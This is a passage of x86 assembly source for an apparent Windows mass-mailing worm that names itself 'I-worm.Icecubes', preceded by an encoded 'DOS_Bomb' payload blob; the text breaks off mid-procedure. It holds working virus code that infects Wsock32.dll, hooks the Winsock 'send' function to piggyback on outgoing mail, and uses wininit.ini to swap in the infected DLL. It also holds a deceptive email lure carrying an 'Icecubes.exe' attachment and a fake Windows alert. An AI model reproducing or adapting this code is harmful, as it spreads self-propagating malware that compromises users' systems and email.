; ; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
; ; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
; ; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
; ; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
; ; THE TEXAS CHAIN SAW MASSACRE..."
;
; ; (I adore this movie :)
;
;Trash_Text: DB 44h, 32h, 2Eh, 23h, 46h, 20h, 2Fh, 2Ah, 2Bh, 46h
; DB 31h, 2Eh, 2Fh, 25h, 2Eh, 46h, 3Fh, 29h, 33h, 46h
; DB 27h, 34h, 23h, 46h, 27h, 24h, 29h, 33h, 32h, 46h
; DB 32h, 29h, 46h, 35h, 23h, 23h, 46h, 2Fh, 35h, 46h
; DB 27h, 28h, 46h, 27h, 25h, 25h, 29h, 33h, 28h, 32h
; DB 46h, 29h, 20h, 46h, 32h, 2Eh, 23h, 6Bh, 6Ch, 32h
; DB 34h, 27h, 21h, 23h, 22h, 3Fh, 46h, 31h, 2Eh, 2Fh
; DB 25h, 2Eh, 46h, 24h, 23h, 20h, 23h, 2Ah, 2Ah, 46h
; DB 27h, 46h, 21h, 34h, 29h, 33h, 36h, 46h, 29h, 20h
; DB 46h, 20h, 2Fh, 30h, 23h, 46h, 3Fh, 29h, 33h, 32h
; DB 2Eh, 35h, 48h, 46h, 2Fh, 28h, 46h, 36h, 27h, 34h
; DB 32h, 2Fh, 25h, 33h, 2Ah, 27h, 34h, 6Bh, 6Ch, 35h
; DB 27h, 2Ah, 2Ah, 3Fh, 46h, 2Eh, 27h, 34h, 22h, 23h
; DB 35h, 32h, 3Fh, 46h, 27h, 28h, 22h, 46h, 2Eh, 23h
; DB 34h, 46h, 2Fh, 28h, 30h, 27h, 2Ah, 2Fh, 22h, 46h
; DB 24h, 34h, 29h, 32h, 2Eh, 23h, 34h, 46h, 20h, 34h
; DB 27h, 28h, 2Dh, 2Ah, 2Fh, 28h, 48h, 46h, 2Fh, 32h
; DB 46h, 2Fh, 35h, 46h, 27h, 2Ah, 2Ah, 6Bh, 6Ch, 32h
; DB 2Eh, 23h, 46h, 2Bh, 29h, 34h, 23h, 46h, 32h, 34h
; DB 27h, 21h, 2Fh, 25h, 46h, 2Fh, 28h, 46h, 32h, 2Eh
; DB 27h, 32h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h
; DB 34h, 23h, 46h, 3Fh, 29h, 33h, 28h, 21h, 48h, 46h
; DB 24h, 33h, 32h, 4Ah, 46h, 2Eh, 27h, 22h, 46h, 32h
; DB 2Eh, 23h, 3Fh, 6Bh, 6Ch, 2Ah, 2Fh, 30h, 23h, 22h
; DB 46h, 30h, 23h, 34h, 3Fh, 4Ah, 46h, 30h, 23h, 34h
; DB 3Fh, 46h, 2Ah, 29h, 28h, 21h, 46h, 2Ah, 2Fh, 30h
; DB 23h, 35h, 4Ah, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 25h
; DB 29h, 33h, 2Ah, 22h, 46h, 28h, 29h, 32h, 46h, 2Eh
; DB 27h, 30h, 23h, 46h, 23h, 3Eh, 36h, 23h, 25h, 32h
; DB 23h, 22h, 6Bh, 6Ch, 28h, 29h, 34h, 46h, 31h, 29h
; DB 33h, 2Ah, 22h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 2Eh
; DB 27h, 30h, 23h, 46h, 31h, 2Fh, 35h, 2Eh, 23h, 22h
; DB 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h, 27h, 35h
; DB 46h, 2Bh, 33h, 25h, 2Eh, 46h, 29h, 20h, 46h, 32h
; DB 2Eh, 23h, 46h, 2Bh, 27h, 22h, 46h, 27h, 28h, 22h
; DB 6Bh, 6Ch, 2Bh, 27h, 25h, 27h, 24h, 34h, 23h, 46h
; DB 27h, 35h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h
; DB 34h, 23h, 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h
; DB 32h, 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 48h, 46h
; DB 20h, 29h, 34h, 46h, 32h, 2Eh, 23h, 2Bh, 46h, 27h
; DB 28h, 46h, 2Fh, 22h, 3Fh, 2Ah, 2Ah, 2Fh, 25h, 6Bh
; DB 6Ch, 35h, 33h, 2Bh, 2Bh, 23h, 34h, 46h, 27h, 20h
; DB 32h, 23h, 34h, 28h, 29h, 29h, 28h, 46h, 22h, 34h
; DB 2Fh, 30h, 23h, 46h, 24h, 23h, 25h, 27h, 2Bh, 23h
; DB 46h, 27h, 46h, 28h, 2Fh, 21h, 2Eh, 32h, 2Bh, 27h
; DB 34h, 23h, 48h, 46h, 32h, 2Eh, 23h, 46h, 23h, 30h
; DB 23h, 28h, 32h, 35h, 46h, 29h, 20h, 6Bh, 6Ch, 32h
; DB 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 46h, 31h, 23h
; DB 34h, 23h, 46h, 32h, 29h, 46h, 2Ah, 23h, 27h, 22h
; DB 46h, 32h, 29h, 46h, 32h, 2Eh, 23h, 46h, 22h, 2Fh
; DB 35h, 25h, 29h, 30h, 23h, 34h, 3Fh, 46h, 29h, 20h
; DB 46h, 29h, 28h, 23h, 46h, 29h, 20h, 46h, 32h, 2Eh
; DB 23h, 46h, 2Bh, 29h, 35h, 32h, 6Bh, 6Ch, 24h, 2Fh
; DB 3Ch, 27h, 34h, 34h, 23h, 46h, 25h, 34h, 2Fh, 2Bh
; DB 23h, 35h, 46h, 2Fh, 28h, 46h, 32h, 2Eh, 23h, 46h
; DB 27h, 28h, 28h, 27h, 2Ah, 35h, 46h, 29h, 20h, 46h
; DB 27h, 2Bh, 23h, 34h, 2Fh, 25h, 27h, 28h, 46h, 2Eh
; DB 2Fh, 35h, 32h, 29h, 34h, 3Fh, 4Ah, 6Bh, 6Ch, 32h
; DB 2Eh, 23h, 46h, 32h, 23h, 3Eh, 27h, 35h, 46h, 25h
; DB 2Eh, 27h, 2Fh, 28h, 46h, 35h, 27h, 31h, 46h, 2Bh
; DB 27h, 35h, 35h, 27h, 25h, 34h, 23h, 48h, 48h, 48h
; DB 44h, 6Bh, 6Ch
;End_Trash_Text:
; END START
DOS_Bomb: DB 0B8h, 013h, 035h, 0CDh, 021h, 089h, 01Eh, 026h, 001h
DB 08Ch, 006h, 028h, 001h, 00Eh, 007h, 033h, 0F6h, 0BBh
DB 035h, 001h, 0B9h, 065h, 002h, 080h, 030h, 066h, 046h
DB 0E2h, 0FAh, 041h, 0BAh, 081h, 000h, 0B8h, 002h, 003h
DB 09Ch, 09Ah, 000h, 000h, 000h, 000h, 0FEh, 0C6h, 075h
DB 0F3h, 0FEh, 0CAh, 078h, 0EFh, 0C3h, 054h, 032h, 044h
DB 032h, 02Eh, 023h, 046h, 020h, 02Fh, 02Ah, 02Bh, 046h
DB 031h, 02Eh, 02Fh, 025h, 02Eh, 046h, 03Fh, 029h, 033h
DB 046h, 027h, 034h, 023h, 046h, 027h, 024h, 029h, 033h
DB 032h, 046h, 032h, 029h, 046h, 035h, 023h, 023h, 046h
DB 02Fh, 035h, 046h, 027h, 028h, 046h, 027h, 025h, 025h
DB 029h, 033h, 028h, 032h, 046h, 029h, 020h, 046h, 032h
DB 02Eh, 023h, 06Bh, 06Ch, 032h, 034h, 027h, 021h, 023h
DB 022h, 03Fh, 046h, 031h, 02Eh, 02Fh, 025h, 02Eh, 046h
DB 024h, 023h, 020h, 023h, 02Ah, 02Ah, 046h, 027h, 046h
DB 021h, 034h, 029h, 033h, 036h, 046h, 029h, 020h, 046h
DB 020h, 02Fh, 030h, 023h, 046h, 03Fh, 029h, 033h, 032h
DB 02Eh, 035h, 048h, 046h, 02Fh, 028h, 046h, 036h, 027h
DB 034h, 032h, 02Fh, 025h, 033h, 02Ah, 027h, 034h, 06Bh
DB 06Ch, 035h, 027h, 02Ah, 02Ah, 03Fh, 046h, 02Eh, 027h
DB 034h, 022h, 023h, 035h, 032h, 03Fh, 046h, 027h, 028h
DB 022h, 046h, 02Eh, 023h, 034h, 046h, 02Fh, 028h, 030h
DB 027h, 02Ah, 02Fh, 022h, 046h, 024h, 034h, 029h, 032h
DB 02Eh, 023h, 034h, 046h, 020h, 034h, 027h, 028h, 02Dh
DB 02Ah, 02Fh, 028h, 048h, 046h, 02Fh, 032h, 046h, 02Fh
DB 035h, 046h, 027h, 02Ah, 02Ah, 06Bh, 06Ch, 032h, 02Eh
DB 023h, 046h, 02Bh, 029h, 034h, 023h, 046h, 032h, 034h
DB 027h, 021h, 02Fh, 025h, 046h, 02Fh, 028h, 046h, 032h
DB 02Eh, 027h, 032h, 046h, 032h, 02Eh, 023h, 03Fh, 046h
DB 031h, 023h, 034h, 023h, 046h, 03Fh, 029h, 033h, 028h
DB 021h, 048h, 046h, 024h, 033h, 032h, 04Ah, 046h, 02Eh
DB 027h, 022h, 046h, 032h, 02Eh, 023h, 03Fh, 06Bh, 06Ch
DB 02Ah, 02Fh, 030h, 023h, 022h, 046h, 030h, 023h, 034h
DB 03Fh, 04Ah, 046h, 030h, 023h, 034h, 03Fh, 046h, 02Ah
DB 029h, 028h, 021h, 046h, 02Ah, 02Fh, 030h, 023h, 035h
DB 04Ah, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 025h, 029h
DB 033h, 02Ah, 022h, 046h, 028h, 029h, 032h, 046h, 02Eh
DB 027h, 030h, 023h, 046h, 023h, 03Eh, 036h, 023h, 025h
DB 032h, 023h, 022h, 06Bh, 06Ch, 028h, 029h, 034h, 046h
DB 031h, 029h, 033h, 02Ah, 022h, 046h, 032h, 02Eh, 023h
DB 03Fh, 046h, 02Eh, 027h, 030h, 023h, 046h, 031h, 02Fh
DB 035h, 02Eh, 023h, 022h, 046h, 032h, 029h, 046h, 035h
DB 023h, 023h, 046h, 027h, 035h, 046h, 02Bh, 033h, 025h
DB 02Eh, 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h
DB 02Bh, 027h, 022h, 046h, 027h, 028h, 022h, 06Bh, 06Ch
DB 02Bh, 027h, 025h, 027h, 024h, 034h, 023h, 046h, 027h
DB 035h, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 031h, 023h
DB 034h, 023h, 046h, 032h, 029h, 046h, 035h, 023h, 023h
DB 046h, 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh
DB 048h, 046h, 020h, 029h, 034h, 046h, 032h, 02Eh, 023h
DB 02Bh, 046h, 027h, 028h, 046h, 02Fh, 022h, 03Fh, 02Ah
DB 02Ah, 02Fh, 025h, 06Bh, 06Ch, 035h, 033h, 02Bh, 02Bh
DB 023h, 034h, 046h, 027h, 020h, 032h, 023h, 034h, 028h
DB 029h, 029h, 028h, 046h, 022h, 034h, 02Fh, 030h, 023h
DB 046h, 024h, 023h, 025h, 027h, 02Bh, 023h, 046h, 027h
DB 046h, 028h, 02Fh, 021h, 02Eh, 032h, 02Bh, 027h, 034h
DB 023h, 048h, 046h, 032h, 02Eh, 023h, 046h, 023h, 030h
DB 023h, 028h, 032h, 035h, 046h, 029h, 020h, 06Bh, 06Ch
DB 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh, 046h
DB 031h, 023h, 034h, 023h, 046h, 032h, 029h, 046h, 02Ah
DB 023h, 027h, 022h, 046h, 032h, 029h, 046h, 032h, 02Eh
DB 023h, 046h, 022h, 02Fh, 035h, 025h, 029h, 030h, 023h
DB 034h, 03Fh, 046h, 029h, 020h, 046h, 029h, 028h, 023h
DB 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h, 02Bh
DB 029h, 035h, 032h, 06Bh, 06Ch, 024h, 02Fh, 03Ch, 027h
DB 034h, 034h, 023h, 046h, 025h, 034h, 02Fh, 02Bh, 023h
DB 035h, 046h, 02Fh, 028h, 046h, 032h, 02Eh, 023h, 046h
DB 027h, 028h, 028h, 027h, 02Ah, 035h, 046h, 029h, 020h
DB 046h, 027h, 02Bh, 023h, 034h, 02Fh, 025h, 027h, 028h
DB 046h, 02Eh, 02Fh, 035h, 032h, 029h, 034h, 03Fh, 04Ah
DB 06Bh, 06Ch, 032h, 02Eh, 023h, 046h, 032h, 023h, 03Eh
DB 027h, 035h, 046h, 025h, 02Eh, 027h, 02Fh, 028h, 046h
DB 035h, 027h, 031h, 046h, 02Bh, 027h, 035h, 035h, 027h
DB 025h, 034h, 023h, 048h, 048h, 048h, 044h, 06Bh, 06Ch
END START
.386
.model flat, stdcall
locals
jumps
extrn ExitProcess:PROC
extrn DialogBoxParamA:PROC
extrn GetModuleHandleA:PROC
extrn EndDialog:PROC
extrn GetWindowRect:PROC
extrn GetDesktopWindow:PROC
extrn MoveWindow:PROC
extrn CreateThread:PROC
extrn SendDlgItemMessageA:PROC
extrn SetDlgItemTextA:PROC
extrn CloseHandle:PROC
extrn GetDlgItemTextA:PROC
extrn GetModuleHandleA:PROC
extrn GetVersion:PROC
.data
Start:
xor ebp, ebp
CheckWindowsVersion:
call GetVersion
or eax, eax
jz ReturnToWormHost
MainRoutines:
pushad
call GET_GETPROCADDRESS_API_ADDRESS
call GET_WINDIR
call GET_SYSDIR
call INFECT_WSOCK
call COPY_HOST_FILE
popad
ReturnToWormHost:
jmp OriginalHost
include windows.inc
include wsocks.inc
include myinc.inc
; get_gpa.inc data
kernel32address dd 0BFF70000h
numberofnames dd ?
addressoffunctions dd ?
addressofnames dd ?
addressofordinals dd ?
AONindex dd ?
AGetProcAddress db "GetProcAddress", 0
AGetProcAddressA dd 0
; directory.inc data
currentdir db 100h dup(0)
sysdir db 100h dup(0)
windir db 100h dup(0)
AGetSystemDirectory db "GetSystemDirectoryA",0
AGetWindowsDirectory db "GetWindowsDirectoryA",0
ASetCurrentDirectory db "SetCurrentDirectoryA",0
; infect_wsock.inc
wsock32dll db "Wsock32.dll",0
wsock32inf db "Wsock32.inf",0
ACopyFile db "CopyFileA",0
infectionflag db 0
AFindFirstFile db "FindFirstFileA",0
myfinddata WIN32_FIND_DATA <>
filesize dd 0
memory dd 0
ADeleteFile db "DeleteFileA",0
; infect_file.inc
ASetFileAttributes db "SetFileAttributesA",0
ACreateFile db "CreateFileA",0
ACreateFileMapping db "CreateFileMappingA",0
AMapViewOfFile db "MapViewOfFile",0
filehandle dd 0
maphandle dd 0
mapaddress dd 0
PEheader dd 0
imagebase dd 0
imagesize dd 0
wnewapiaddress dd 0
AUnmapViewOfFile db "UnmapViewOfFile",0
ACloseHandle db "CloseHandle",0
ASetFilePointer db "SetFilePointer",0
ASetEndOfFile db "SetEndOfFile",0
ASetFileTime db "SetFileTime",0
; hook_api.inc
woldapiaddress dd 0
; rva_to_raw.inc
rva2raw dd 0
; get_api.inc
user32address dd 0
wsock32address dd 0
; create_ini_file.inc
inifile db "wininit.ini",0
writtensize dw 0
inicrlf db 0dh,0ah,0
rename db "[rename]",13,10
slashsign db "\",0
equalsign db "=",0
writtenbytes dd 0
AWriteFile db "WriteFile",0
; ws_copy_host_file
AGetModuleFileName db "GetModuleFileNameA",0
; get_bases.inc
ALoadLibrary db "LoadLibraryA",0
k32 db "KERNEL32.dll",0
user32 db "USER32.dll",0
wsock32 db "WSOCK32.dll",0
; host_code.inc
dlgrect RECT <>
desktoprect RECT <>
dlgwidth dd 0
dlgheight dd 0
threadid dd 0
initflag dd 0
okflag dd 0
flag dd 0
pastvalue dd 0
currentvalue db '2',0
doneflag dd 0
value11 db "Days",0
value12 db "Weeks",0
value13 db "Months",0
value14 db "Years",0
value3 db "5000",0
value4 db "17",0
; ic.asm
hInst dd 0
; write_to_file.inc
passwordfile db "icecube.txt",0
; ws_intercept.inc
socketh dd 0
status db 0
AGlobalAlloc db "GlobalAlloc",0
fromaddress dd 0
fromsize dd 0
rcptnumber dd 0
rcpt_buffer_address dd 0
rcpt_size_address dd 0
totalrcptsize dd 0
fromtag db 'From:',0
totag db 'To:',0
mimeendtag db '>',0
mimefrom_address dd 0
mimefromsize dd 0
fromstatus db 0
tostatus db 0
toendtag db 'Subject:',0
mimetosize dd 0
mimeto_address dd 0
; ws_b64_encoder.inc
encTable db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv'
db 'wxyz0123456789+/'
; ws_attachment
wsock2 db "Wsock2.dll",0
smHnd dd 0
dmHnd dd 0
bytesread dd 0
encodedsize dd 0
AReadFile db "ReadFile",0
AGetFileSize db "GetFileSize",0
; ws_send_mail
email_buffer_address dd 0
email_size dd0
datatag db'DATA',0dh,0ah
emailid db'Message-ID: <a1234>',0dh,0ah
emailstart db 'Subject: Fw: Windows Icecubes !',0dh,0ah
db'MIME-Version: 1.0',0dh,0ah
db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah
db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah
db 0dh,0ah
db '----- Original Message -----', 0dh,0ah
db 0dh,0ah
db '>Look at what I found on the web. This tool scans your system for
hidden Windows settings.', 0dh, 0ah
db '>These settings, which are better known as the "Windows Icecubes",
were built in Windows by', 0dh,0ah
db '>the programmers at Microsoft and were supposed to be kept secret. ',
0dh,0ah
db '>',0dh,0ah
db '>Just take a look, cause I think you might want to make some changes
;).',0dh,0ah
db '>',0dh,0ah
db 0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: application/octet-stream; name="Icecubes.exe"'
db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-Disposition: attachment; filename="Icecubes.exe"',0dh
,0ah,0dh,0ah
emailend db 0dh,0ah
emailtail db 0dh,0ah,0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah
endtag db 0Dh,0Ah,2Eh,0Dh,0Ah
timedate SYSTEMTIME <>
AMessageBox db "MessageBoxA",0
AGetSystemTime db "GetSystemTime",0
msgmessage db "Windows detected icecubes on your harddrive.",10,13
db "This may cause the system to stop responding.",10,13
db "Do you want Windows to remove all icecubes ?",0
windowtitle db "I-worm.Icecubes / f0re",0
ASend db "send",0
ARecv db "recv",0
recvbuffer db 100h dup(0)
LoadExportTableData:
mov edi, [ebp + kernel32address] ; get exporttable
add edi, [edi + 3ch] ; address from
mov esi, [edi + 78h] ; kernel's PE header
add esi, [ebp + kernel32address]
BeginProcAddressSearch:
mov esi, [ebp + addressofnames] ; search for GetProc
mov [ebp + AONindex], esi ; Address API in names
mov edi, [esi] ; table
add edi, [ebp + kernel32address]
xor ecx, ecx
lea ebx, [ebp + AGetProcAddress]
TryAgain:
mov esi, ebx
MatchByte:
cmpsb
jne NextOne
cmp byte ptr [esi], 0 ; did the entire string
je GotIt ; match ?
jmp MatchByte
NextOne:
inc cx
add dword ptr [ebp + AONindex], 4 ; get next namepointer
mov esi, [ebp + AONindex] ; in table (4 dwords)
mov edi, [esi]
add edi, [ebp + kernel32address] ; align with kernelbase
jmp TryAgain
GotIt:
shl ecx, 1
mov esi, [ebp + addressofordinals] ; ordinal = nameindex *
add esi, ecx ; size of ordinal entry
xor eax, eax ; + ordinal table base
mov ax, word ptr [esi]
shl eax, 2 ; address of function =
mov esi, [ebp + addressoffunctions] ; ordinal * size of
add esi, eax ; entry of address
mov edi, dword ptr [esi] ; table + base of
add edi, [ebp + kernel32address] ; addresstable
mov [ebp + AGetProcAddressA], edi ; save GPA address
ret
GET_GETPROCADDRESS_API_ADDRESS endp
GET_WSOCK32_BASE_ADDRESS proc
LoadWsock32:
lea eax, [ebp + wsock32] ; not found, then
push eax ; load the dll
lea eax, [ebp + ALoadLibrary] ; first
call GETAPI
mov [ebp + wsock32address], eax
ret
GET_WSOCK32_BASE_ADDRESS endp
GET_USER32_BASE_ADDRESS proc
GetUser32Base:
lea eax, [ebp + user32]
push eax
lea eax, [ebp + ALoadLibrary]
call GETAPI
mov [ebp + user32address], eax
ret
GET_USER32_BASE_ADDRESS endp
GETAPI proc
push eax
push dword ptr [ebp + kernel32address] ; load kernelbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax ; call the api
ret ; return
GETAPI endp
GETUAPI proc
push eax
push dword ptr [ebp + user32address] ; load wsockbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax
ret
GETUAPI endp
GETWAPI proc
push eax
push dword ptr [ebp + wsock32address] ; load wsockbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax
ret
GETWAPI endp
GetWindowsDir:
push 128h ; size of dirstring
lea eax, [ebp + windir] ; save it here
push eax
lea eax, [ebp + AGetWindowsDirectory] ; get windowsdir
call GETAPI
ret
GET_WINDIR endp
GET_SYSDIR proc
GetSystemDir:
push 128h ; size of dirstring
lea eax, [ebp + sysdir] ; save it here
push eax
lea eax, [ebp + AGetSystemDirectory] ; get system dir
call GETAPI
ret
GET_SYSDIR endp
SET_WINDIR proc
SetWindowsDir:
lea eax, [ebp + windir] ; change to sysdir
push eax
lea eax, [ebp + ASetCurrentDirectory]
call GETAPI
ret
SET_WINDIR endp
SET_SYSDIR proc
SetSystemDir:
lea eax, [ebp + sysdir] ; change to sysdir
push eax
lea eax, [ebp + ASetCurrentDirectory]
call GETAPI
ret
SET_SYSDIR endp
INFECT_WSOCK proc
WsockSetSystemDirectory:
call SET_SYSDIR
CopyWSockFile:
push 00h
lea eax, [ebp + wsock32inf]
push eax
lea eax, [ebp + wsock32dll]
push eax
lea eax, [ebp + ACopyFile]
call GETAPI
SearchWsockFile:
mov [ebp + infectionflag], 00h
lea eax, [ebp + myfinddata] ; win32 finddata structure
push eax
lea eax, [ebp + wsock32inf] ; get wsock32.inf
push eax
lea eax, [ebp + AFindFirstFile] ; find the first file
call GETAPI
cmp eax, 0FFFFFFFh
je WsockEndSearch
GoInfectWsockInf:
mov ecx, [ebp + myfinddata.fd_nFileSizeLow] ; ecx = filesize
mov [ebp + filesize], ecx ; save the filesize
add ecx, Leap - Start + 1000h ; filesize + virus
mov [ebp + memory], ecx ; + workspace = memory
call INFECT_FILE
cmp [ebp + infectionflag], 01
je DeleteWsockFile
call CREATE_INI_FILE
jmp WsockEndSearch
DeleteWsockFile:
lea eax, [ebp + wsock32inf]
push eax
lea eax, [ebp + ADeleteFile]
call GETAPI
DeleteIniFile2:
call SET_WINDIR
lea eax, [ebp + inifile]
push eax
lea eax, [ebp + ADeleteFile]
call GETAPI
WsockEndSearch:
ret
INFECT_WSOCK endp
INFECT_FILE proc
SetAttributesToNormal:
push 80h
lea esi, [ebp + myfinddata.fd_cFileName] ; esi = filename
push esi
lea eax, [ebp + ASetFileAttributes]
call GETAPI
OpenFile:
push 0 ; template handle=0
push 20h ; attributes=any file
push 3 ; type= existing file
push 0 ; security option = 0
push 1 ; shared for read
push 80000000h or 40000000h ; generic read write
push esi ; offset file name
lea eax, [ebp + ACreateFile]
call GETAPI
MapViewOfFile:
push dword ptr [ebp + memory] ; memory to map
push 0 ; file offset
push 0 ; file offset
push 2 ; file map write mode
push eax ; file map handle
lea eax, [ebp + AMapViewOfFile] ; ok map the file
call GETAPI
or eax, eax
jz CloseMap
mov esi, eax ; esi= base of map
mov [ebp + mapaddress], esi ; save that base
DoSomeChecks:
cmp word ptr [esi], 'ZM' ; an exe file?
jne UnmapView
cmp word ptr [esi + 38h], 'll' ; already infected?
jne OkGo
mov [ebp + infectionflag], 1 ; set infectionflag
jmp UnmapView
OkGo:
mov ebx, dword ptr [esi + 3ch]
cmp ebx, 200h
ja UnmapView
add ebx, esi
cmp dword ptr [ebx], 'EP' ; is it a PE file ?
jne UnmapView
LocateBeginOfLastSection:
movzx ebx, word ptr [esi + 20d] ; optional header size
add ebx, 24d ; file header size
movzx eax, word ptr [esi + 6h] ; no of sections
dec eax ; (we want the last-1
mov ecx, 28h ; sectionheader)
mul ecx ; * header size
add esi, ebx ; esi = begin of last
add esi, eax ; section's header
ChangeLastSectionHeader:
or dword ptr [esi + 24h], 00000020h or 20000000h or 80000000h
NewAlignedPhysicalSize:
mov eax, dword ptr [esi + 10h] ; old phys size
push eax ; save it
VirtualSizeCheck:
mov edi, dword ptr [esi + 8h] ; get old
cmp eax, edi ; virtualsize
jge NewVirtualSize
VirtualSizeIsVirtual:
add edi, Leap-Start
mov eax, edi
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 38h]
div ecx ; and align it to
inc eax ; the sectionalign
mul ecx
NewVirtualSize:
mov [esi + 8h], eax ; save new value
NewAlignedImageSize:
mov eax, dword ptr [esi + 0ch] ; get virtual offset
add eax, dword ptr [esi + 8h] ; + new virtual size
mov [ebp + imagesize], eax ; = new imagesize
NewAlignedFileSize:
mov eax, dword ptr [esi + 10h] ; get new phys size
add eax, dword ptr [esi + 14h] ; add offset of phys
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 3ch]
div ecx ; and align it to
inc eax ; the filealign
mul ecx
mov [ebp + filesize], eax ; size = filesize
CalculateNewWsockApiAddress:
pop eax
push eax
add eax, dword ptr [esi + 0ch] ; + virtual offset
add eax, InterceptWsockApiCall - Start ; + ip
mov [ebp + wnewapiaddress], eax ; new api address
jmp HookDaApi
HookDaApi:
push esi
call HOOK_API
pop esi
CopyVirusToEndOfFile:
pop eax
mov edi, eax
add edi, [ebp + mapaddress] ; mapaddress
add edi, [esi + 14h] ; add raw data offset
lea esi, [ebp + Start] ; copy virus
mov ecx, (Leap-Start)/4 + 4
cld
rep movsd
UpdatePEHeaderWithChanges:
mov esi, [ebp + mapaddress]
mov word ptr [esi + 38h], 'll' ; set infectionmark
mov esi, [ebp + PEheader]
mov eax, [ebp + imagesize]
mov [esi + 50h], eax ; set new imagesize
UnmapView:
push dword ptr [ebp + mapaddress]
lea eax, [ebp + AUnmapViewOfFile]
call GETAPI
CloseMap:
push dword ptr [ebp + maphandle]
lea eax, [ebp + ACloseHandle]
call GETAPI
push 0
push 0
push dword ptr [ebp + filesize]
push dword ptr [ebp + filehandle]
lea eax, [ebp + ASetFilePointer]
call GETAPI
CloseFile:
push dword ptr [ebp + myfinddata.fd_ftLastWriteTime]
push dword ptr [ebp + myfinddata.fd_ftLastAccessTime]
push dword ptr [ebp + myfinddata.fd_ftCreationTime]
push dword ptr [ebp + filehandle]
lea eax, [ebp + ASetFileTime]
call GETAPI
InfectionError:
push dword ptr [ebp + myfinddata.fd_dwFileAttributes]
lea eax, [ebp + myfinddata.fd_cFileName]
push eax
lea eax, [ebp + ASetFileAttributes]
call GETAPI
ret
INFECT_FILE endp
;===========================[ ic-hook_api.inc ]=============================;
HOOK_API proc
LoadWSockExportTableData:
mov edi, [ebp + PEheader]
mov esi, dword ptr [edi + 78h] ; rva export table
push esi
mov eax, dword ptr [esi + 1Ch] ; get ra of table with
pop esi
push esi
mov eax, dword ptr [esi + 20h] ; get ra of table with
pop esi
push esi
BeginSendAddressSearch:
mov esi, [ebp + addressofnames] ; search for
mov [ebp + AONindex], esi ; API in names
mov edi, [esi] ; table
HookSendApi:
lea ebx, [ebp + ASend]
OkTryAgain:
mov esi, ebx
MatchByteNow:
cmpsb
jne NextOneNow
cmp byte ptr [esi], 0 ; did the entire string
je YesGotIt ; match ?
jmp MatchByteNow
NextOneNow:
inc cx
add dword ptr [ebp + AONindex], 4 ; get next namepointer
mov esi, [ebp + AONindex] ; in table (4 dwords)
mov edi, [esi]
push ebx
push ecx
pop ecx
pop ebx
jmp OkTryAgain
YesGotIt:
shl ecx, 1
mov esi, [ebp + addressofordinals] ; ordinal = nameindex *
add esi, ecx ; size of ordinal entry
xor eax, eax ; + ordinal table base
mov ax, word ptr [esi] ; offset of address
shl eax, 2 ; of function = ordinal
mov esi, [ebp + addressoffunctions] ; * size of entry of
add esi, eax ; address table
mov edi, dword ptr [esi] ; get address
SaveNewWsockApiAddress:
mov [ebp + woldapiaddress], edi ; save it
ChangeWsock:
mov eax, dword ptr [ebp + wnewapiaddress] ; new api address
mov dword ptr [esi], eax ; set it
ret
HOOK_API endp
RVA_TO_RAW proc
GetRaw:
mov ebx, [ebp + mapaddress]
mov [ebp + rva2raw], edx
FindCorrespondingSection:
mov eax, dword ptr [ebp + rva2raw] ; rva we want into raw
mov edx, dword ptr [edi + 12d] ; section RVA
sub eax, edx
cmp eax, dword ptr [edi+08d] ; section size
jb SectionFound
NotThisSection:
add edi, 40d
loop FindCorrespondingSection
EndRawSearch:
ret
SectionFound:
mov ecx, dword ptr [edi+20d] ; pntr to section's raw
sub edx, ecx ; data from beginning
add ecx, eax ; of file
add ecx, ebx
ret
RVA_TO_RAW endp
CREATE_INI_FILE proc
IniGetSetWindowsDir:
call SET_WINDIR
CreateInstallIni:
push 0 ; template handle=0
push 20h ; attributes=any file
push 4 ; type= new file
push 0 ; security option = 0
push 1 ; shared for read
push 80000000h or 40000000h ; generic read write
lea eax, [ebp + inifile]
push eax ; offset file name
lea eax, [ebp + ACreateFile]
call GETAPI
mov [ebp + filehandle], eax
SetIniFilePointerToEnd:
push 02h
push 00h
push 00h
push [ebp + filehandle]
lea eax, [ebp + ASetFilePointer]
call GETAPI
mov dword ptr [ebp + writtensize], 00h
WriteInstallIniLoop:
lea esi, [ebp + inicrlf]
xor ecx, ecx
call StringSize
call Write
WriteWsock32Dll:
lea esi, [ebp + wsock32dll] ; write original dll
xor ecx, ecx
call StringSize
call Write
WriteOn:
lea esi, [ebp + equalsign] ; write original dll
xor ecx, ecx
call StringSize
call Write
WriteInfectedWsock:
lea esi, [ebp + wsock32inf] ; write original dll
xor ecx, ecx
call StringSize
call Write
jmp CloseInstallIni
StringSize:
cmp byte ptr [esi + ecx], 0h
je GotSize
inc ecx
jmp StringSize
GotSize:
mov word ptr [ebp + writtensize], cx
ret
Write:
push 0h
lea eax, [ebp + writtenbytes]
push eax
